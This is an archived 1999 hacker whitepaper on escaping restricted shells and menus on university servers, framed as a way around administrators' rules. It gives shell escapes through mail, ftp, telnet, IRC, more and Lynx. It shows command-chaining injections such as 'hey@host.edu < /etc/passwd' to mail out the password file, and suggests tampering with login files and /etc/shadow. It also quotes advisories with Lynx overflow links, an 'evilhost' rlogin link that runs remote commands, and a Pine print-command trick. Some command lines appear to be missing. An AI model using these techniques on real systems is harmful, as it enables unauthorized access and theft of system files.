exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New


Posted Aug 17, 1999
Authored by Efrain Torres, lownoise

How To Break Out of Restricted Shells and Menus, v2.3 - An excellent whitepaper detailing methods for breaking out of virtually any kind of restricted shell or menu you might come across.

tags | paper, shell
SHA-256 | 0360f346bef57652d779fb01c3362de641f401dfd13d44fbab3f2c7c778c40b3


Change Mirror Download
(Restricted shells, menus and that kind of s***)
by ET LoWNOISE 1999



I change the title of this document because some people dont like
to read the kind of words that they use everyday. The real title
of this document is: "How to stop a fucking menu and kill the stupid

Often universities implement stupid restrictions in their servers
And clients of student use that the only thing that they avoid is
the correct use of the resources available for you and for the others,
that pay a hi price to study in a quality college.

But the common thing is that your university says that supports the
Investigation, but this is simply a privilege of few and if you wish
To investigate or to learn on something, the amount of estupid people
That you have to fight against, thanks to the mistify technology policy,
And more letters, etc. it will show you that in fact they do not help,
they just collaborate with the increase of the technological mediocrity
of this hell and beautifull country of mine.

This document is not a great inspiration for 31337 gurus, it is a simple
document so that any person with estupid limitations can jump them.


You wish to learn UNIX (to realize that MICROSUCKS stinks out) and to
request an account shell in another server to learn, is something that
would not give you for multiple reasons, like not being from advanced
semesters or things like that.

The only thing that you have its a beautiful account with a beautiful
menu (implemented Menu that causes that any task takes 3 times the
normal run time and avoids the possibility of having direct access to
the system).

The multiple ways to eliminate menu depend directly on the form as it
were implemented and the services that render. For that reason we will
begin using the simple way:

1. Services

To jump the menu first you will have to know what applications you have
normal access then some will have internal options that allow the
execution of direct commands and/or in the best of cases take you to the
shell prompt.

A simple menu in general have the following services which in fact are
direct calls to the applications:

- E-mail (pine, mail)
- File Transfer (FTP)
- Connect to other server (telnet)
- Basic system commands (ex. finger, vi)
- Configuration Setup
- Some kind of chat (ex. IRC)

1.1 Access to vi (Taken from alt.2600 FAQ)

Vi its a tipic and powerful text editor that maybe you have access to,
when selecting the option to edit or to see the content of a file
stored in your account. This is taken from the FAQ of alt.2600 and is
in fact the tipic and most known example that by obligation must be
included in this document.

Execute Vi and type this command:


Then leave to the shell using this command:


If you restricted shell prevents the use of the command " CD ",
Execute FTP to your account and then you can take a walk by the
files using " CD ".

1.2 Access to "mail" program

If you have access to "mail" program for the handling of E-mail
in your account follow the following steps:

Execute the menu option that makes a call to the mail program.
In some menus or restricted shells you have the possibility
to choose whatt application is used to handle your mail.
Choose "mail" (no pine) and execute it.

If you do not have any new mail to read, mail informe you that
it does not have mail to read and bring back the menu.

1. Email (mail) <------- Select Option to E-Mail

No mail for user1.....
(It returned automatic to options menu)


1. Email (mail) <------- Select Option to E-Mail

Mail version ?. Type ? for help.
"/var/spool/mail/user1": 1 messages

> 1 user1@my.host.edu Thu Sep 1 1:11 1/98 "test"

Ok now we are at the mail prompt "&" so now just
type this:

$ <------------ Another dead menu :).

Note: Many programs use the character "!" in order to
talk about the command who allows the direct
execution of shell commands, in the best case
you must execute /bin/sh to leave to the shell
(command interpreter).

1.3 FTP and Telnet

FTP and Telnet they also have the capacity of being able to
execute commands from the prompt of each one with the same
character "!" like this:

ftp> !ps <-------- !(command)
2679 p2 S 0:01 -menu
2832 p2 R 0:00 ps

2679 p2 S 0:01 -menu
2832 p2 R 0:00 ps

Sometimes depending on the initial configuration of your account,
the execution of commands using methods like this causes that
sometimes the program is not located and therefore not executed.
Its recomended then that at the moment for executing any command
give the complete path (localization within the system).


ftp> !/usr/bin/ps
2679 p2 S 0:01 -menu
2832 p2 R 0:00 ps

NOTE: Always try to execute !/bin/sh

NOTE FOR WIN95/98 (winshit95/98) AND (winsucksNT) NT:
The same applies for these stinking " operating systems ":

Microsoft<R> Windows NT DOS
<C>Copyright Microsoft Corp 1990-1996.


With respect to FTP its very easy to get the prompt because it always
appears after making or when ABORTING a connection. For telnet the
problem is that some menus when giving the telnet option, immediately
is going to request the host name or ip to connect itself without
having the opportunity to use the prompt at any moment, but for
this try to make a connection and in the connection process press
keys CONTROL+ ] to cancel all work leaving you at the telnet prompt.

1.4 IRC

If the menu o restricted shell has access to the IRC client (Internet
Relay Chat) when entering, you can execute any command with
/EXEC (command).

1.5 Lynx

Lynx is the text client used in menus to get html pages (www). If the
execution of commands is enabled in Lynx (negligence in the installation
and configuration) it can be used special URLs to execute arbitrary
commands in the system. Any command can be executed.

The URLs used are lynxexec and lynxprog:

lynxexec:ls -l

lynx lynxexec://localhost/finger

1.6 MORE

Some restricted shells use a command line program called "more"
to show a list, this program makes a pause when the screen is
full of data and wait for the user to press the space bar to
continue, and it show at the bottom of the screen the percent
showed at that moment.

If u think that u have access at any moment to this program
(example: an option that show any anouncement about the system
made by the administrator) type:

!/bin/sh (this will execute the shell)

type ? to see more options.


2. Implementation

Depends on the way they implemented the menu (programming, language,
the form as it is executed) makes difficult or facilitates the tricks
to jump the imposed restrictions. Thats the reason why it is possible
that you need to modify a little the described forms so they can work.

2.1. TRAPS

In fact im sure that this case does not apply but is worth the trouble
to try (you neve know). " God works in mysterious ways ".

In UNIX you have combinations of keys that when they are pressed they
send a signal to the program that is executing. Depending on the sent
signal the program will abort or suspend the execution.

Multiple signals exist and if in the menu porgramming " traps " are
not handled that control the behavior of the program (menu), when
receiving a certain signal you could leave the menu without any

At the time of initiating the menu press:

CONTROL + C (Abort execution)
CONTROL + Z (Suspend execution)

NOTE: Again it is not probable that this work, just a crazy programmer
will leave this kind of things behind.

2.2 Configuration

Some menus have configuration (Setup) options, which you can modify at
any time to choose what editor you use, what type of terminal or the
mail program you prefer to work with.

For negligence in the programming of the menu is possible that u can
find fields that can be left in clean (empty) entering one or several
spaces, in the bottom for example if we enter to text editor's
configuration and we are requested to type the name of the program to
use (Ex. pico, vi) when we return to the main menu and let us choose
text editor's option the menu will make the call to the application
that previously we have typed. If in the configuration we can leave
the field in white as a group of typed spaces when we execute the menu
and we are requested the name of the file to publish (edit) there in
that moment we will be able to give him any command to execute.

If u prefers it also instead of leaving in spaces the field, just place
the command to execute,although this method is a little annoying if u will execute multiple commands.


(Setup Option)
Type The Text Editor to use (Pico , Vi)?: _ <--- spaces
(Main Menu, "Edit" Option )
Type the filename to edit: ps <------ Command

2679 p2 S 0:01 -menu
2832 p2 R 0:00 ps

This case depends on how was implemented the menu and how creative
you can be.

2.3 Beginning & Setup Files (.login ,.profile)

Commonly when you enter to your account, the shell automatically executes
Some commands included in a certain file (on tcsh it is .profile, on
other shells is .login ).

Some administrators to execute the menu every time you logon to your account they include the line in this file. If the permits were not well placed to the file it is possible to edit this file or to upload using FTP a .profile or .login according to the case, eliminating the lines that executethe menu. (Or simply erase the complete file).

If you can see the content of the setup file of the shell and you realize that
the menu is called directly without including its path, you can create a file
with the same name, containing one line as /bin/sh and then put in your
account. If the PATH variable is not well defined and the execution of the menu isn't a direct call in the file /etc/passwd, when you enter to the account
again the system will execute the mistaken menu (its kind of a Trojan Horse)
, leaving you directly in the shell defined.

NOTE: be careful with the permisions of the new file.

2.4 linking Commands

Another form of executing commands is to use characters that link
commands in the shell this way:

user1> finger @some.host.edu;ps <---------------- Check the ";"

Welcome to Linux version 2.0.30 at some.host.edu !

4:02pm up 6 days, 2:51, 3 users, load average: 0.05, 0.02, 0.00

Login Name Tty Idle Login Time Office Office Phone
user1 p0 1 Sep 11 14:38 (xxx.25.64.xxx)
user2 p1 Sep 11 16:01 (xxx.25.65.xxx)
user3 p3 4 Sep 11 15:29 (xxx.25.68.xxx)

9562 p1 S 0:00 -tcsh
9576 p1 R 0:00 ps


Now you have noticed that in one line you can link multiple
commands and execute them one behind another. Likewise if in the
menu they have not taken the care of eliminate characters like
this one ";" , when is requested some parameter for some
internal command , you add more necessary commands :).

(Finger Menu Option)
Type the Host: www.host.edu;ps
(this will execute "finger @www.host.edu;ps" )


Welcome to Linux version 2.0.30 at www.host.edu !

4:02pm up 6 days, 2:51, 3 users, load average: 0.05, 0.02, 0.00

Login Name Tty Idle Login Time Office Office Phone
user1 p0 1 Sep 11 14:38 (xxx.25.64.xxx)
user2 p1 Sep 11 16:01 (xxx.25.65.xxx)
user3 p3 4 Sep 11 15:29 (xxx.25.68.xxx)

9562 p1 S 0:00 -menu
9576 p1 R 0:00 ps

Also work according to the application that in fact will be called
with rerouting characters and others ( >>,<<,>,<,&,!,;,:,|).

A little example to get the idea why to use this characters check this out:

char *your_email_address
char *execute_this_command

strcpy(execute_this_command,"mail ");

What happen here?.. well , you found an option that send u some shit to
a especific e-mail address. so u normally enter the e-mail address but
what happen if u enter a e-mail address like this one:

hey@host.edu < /etc/passwd

because what it really does is:

mail hey@host.edu < /etc/passwd

so its going to send u the /etc/passwd file to the e-mail address you choose.
NOW do u get the IDEA? (this kind of things are some of the things that
you can do too with poor implemented CGI`s on WWW servers)

2.5 Ok I can execute commands. So what can i do now?

Everything: (Buffers Overflows, etc etc).

Suddenly you don't find a way to leave directly to the shell but u can
execute any command that u want. Modify an exploit that instead of executing
in their code the /bin/sh ,executes a program that for example modifies the line in /etc/passwd and /etc/shadow so that executes directly a shell and not a menu when you log on.

Compile it in another host and upload it to your account. Now execute it as if it was a simple command, the rest leaves to your imagination.

Many ways exist to be able to surpass those small limitations that
they like to create. Everything depends on the creativity and the desires
to learn that you have. The curiosity will never be a crime.


Here are some recent exploits that can be useful according
to the case:

3.1 Latest Lynx BUGS

Michal Zalewski (lcamtuf@IDS.PL)
Sun, 6 Sep 1998 00:53:24 +0200

Trivial Overflows on:

<a href="rlogin://(aprox. 1454 veces 'A')">...</a>,
<a href="telnet://(aprox. 1454 veces 'A')">...</a> o
<a href="tn3270://(aprox. 1454 veces 'A')">...</a>

Chooses your favorite protocol, beautiful SEGV in 0x41414141. Also,
Overflows in finger://, cso://, nntp:// and news://. Unfortunately
they are not so easily exploitable. 1454 bytes are perfect for
lynx 2.8.x under Linux. It can vary in other platforms.

Nothing more to say. Me (Michal Zalewski (lcamtuf@IDS.PL)) reports similar overflows
similar in the protocol mailto: months ago. I don't have idea if they have been fixed.

Examples: http://dione.ids.pl/~lcamtuf/pliki/browsers.html.gz

Artur Grabowski (art@STACKEN.KTH.SE)
Tue, 17 Nov 1998 17:06:00 +0100

Lynx has a feature that allows trojans.

For users on systems where lynx is the login shell or somehow the only
program allowed to run, the user can obtain a shell by simply "clicking"
a link that looks like this: <a href="rlogin://foo;sh@foo">foo</a>.

Running hostile code is also easy with this feature:
<a href="rlogin://eviluser|sh@evilhost.foo">foo</a>. The login shell
(or something similiar) for eviluser@evilhost.foo prints out a few commands
to run on the victim.

3.2 PINE Bugs

(Chris Wilson <cmw32@HERMES.CAM.AC.UK>)

Vulnerability in Pine, proven in version 3.95q, but
it probably applies to all the versions up to 4.02
this vulnerability allows the execution of commands in
restricted enviroments.

When a printer is selected, it is possible to choose
the option Personally selected print command."

This allows to specify a command which pine will execute
when a document will be printed.

Changing the value of this selection. It is possible to
execute any command when something is printed.
For this reason administrators disable this with an option
in the file pine.conf.fixed.

But if you modify the file manually .pinerc, adding
one line as:

printer=test [] echo Hello! > test

Then this will jump the imposed restrictions and it will execute
the command each time that it is said that it is print any document.


If u dont like this document dont worry, dont read it.

ET 1999. et@cyberspace.org <--- this one is the real one


Login or Register to add favorites

File Archive:

June 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    18 Files
  • 2
    Jun 2nd
    13 Files
  • 3
    Jun 3rd
    0 Files
  • 4
    Jun 4th
    0 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    0 Files
  • 7
    Jun 7th
    0 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    0 Files
  • 11
    Jun 11th
    0 Files
  • 12
    Jun 12th
    0 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags


packet storm

© 2022 Packet Storm. All rights reserved.

Security Services
Hosting By